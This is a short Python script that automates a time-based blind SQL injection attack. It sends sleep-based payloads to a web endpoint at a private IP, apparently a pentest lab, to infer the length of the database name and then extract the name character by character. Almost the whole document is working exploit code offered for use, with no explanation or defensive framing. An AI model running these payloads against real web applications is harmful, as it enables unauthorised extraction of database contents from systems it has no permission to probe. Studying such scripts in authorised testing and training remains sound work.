#encoding=utf-8

#Time Blind Script

import requests

import time

import datetime
#Get database length
def database_len():
   
    #Store the results
    length=0
    database=''
    print ("start get length...")

    for l in range(1,15):

        startTime1=time.time()

        url1 = "http://172.20.10.14/pentest/test/time/?type=1 and if(length(database())=%d,sleep(1),1)"%(l)

        response1 = requests.get(url1)

        if time.time() - startTime1 > 1:

            length+=l

    print ("the length :" , str(length))

       # break

    print ("start database sql injection...")
database_len()
#Get database name
def database_name():
    name = ''
    for j in range(1, 15):           #Modify the value of 15 according to the length of the database name
        for i in '0123456789abcdefghijklmnopqrstuvwxyz':
            url = '''http://172.20.10.14/pentest/test/time/'''
            payload = '''?type=if(substr(database(),%d,1)='%s',sleep(2),1)''' % (
                j, i)
            # print(url+payload+'%23')
            time1 = datetime.datetime.now()
            r = requests.get(url + payload + '%23')
            time2 = datetime.datetime.now()
            sec = (time2 - time1).seconds
            if sec >= 2:
                name += i
                print(name)
                break
    print('database_name:', name)


database_name()
